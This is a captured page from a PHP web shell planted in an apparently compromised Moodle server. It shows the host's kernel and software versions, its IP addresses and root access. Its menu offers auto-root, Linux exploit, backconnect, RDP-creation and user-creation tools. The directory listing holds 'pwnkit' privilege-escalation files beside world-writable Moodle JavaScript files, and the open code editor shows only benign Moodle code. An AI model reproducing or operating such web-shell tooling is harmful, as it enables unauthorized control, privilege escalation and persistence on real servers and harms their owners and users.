Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
user /
amd /
build /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
local
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
participants.min.js
8.02
KB
-rwxrwxrwx
participants.min.js.map
12.93
KB
-rwxrwxrwx
participantsfilter.min.js
14.9
KB
-rwxrwxrwx
participantsfilter.min.js.map
24.26
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
repository.min.js
894
B
-rwxrwxrwx
repository.min.js.map
2.44
KB
-rwxrwxrwx
status_field.min.js
9.16
KB
-rwxrwxrwx
status_field.min.js.map
14.52
KB
-rwxrwxrwx
unified_filter.min.js
1.92
KB
-rwxrwxrwx
unified_filter.min.js.map
6.99
KB
-rwxrwxrwx
unified_filter_datasource.min....
1.25
KB
-rwxrwxrwx
unified_filter_datasource.min....
4.6
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : unified_filter_datasource.min.js
/** * Datasource for the core_user/unified_filter. * @deprecated since Moodle 3.9 MDL-68612 - user unified filter replaced by participants filter. * * This module is compatible with core/form-autocomplete. * * @package core_user * @copyright 2017 Jun Pataleta * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ define("core_user/unified_filter_datasource",["jquery","core/ajax","core/notification"],(function($,Ajax,Notification){return{list:function(selector,query){var filteredOptions=[],el=$(selector),originalOptions=$(selector).data("originaloptionsjson"),selectedFilters=el.val();$.each(originalOptions,(function(index,option){return""!==query.trim()&&-1===option.label.toLocaleLowerCase().indexOf(query.toLocaleLowerCase())||$.inArray(option.value,selectedFilters)>-1||filteredOptions.push(option),!0}));var deferred=new $.Deferred;return deferred.resolve(filteredOptions),deferred.promise()},processResults:function(selector,results){var options=[];return $.each(results,(function(index,data){options.push({value:data.value,label:data.label})})),options},transport:function(selector,query,callback){this.list(selector,query).then(callback).catch(Notification.exception)}}})); //# sourceMappingURL=unified_filter_datasource.min.js.map
Close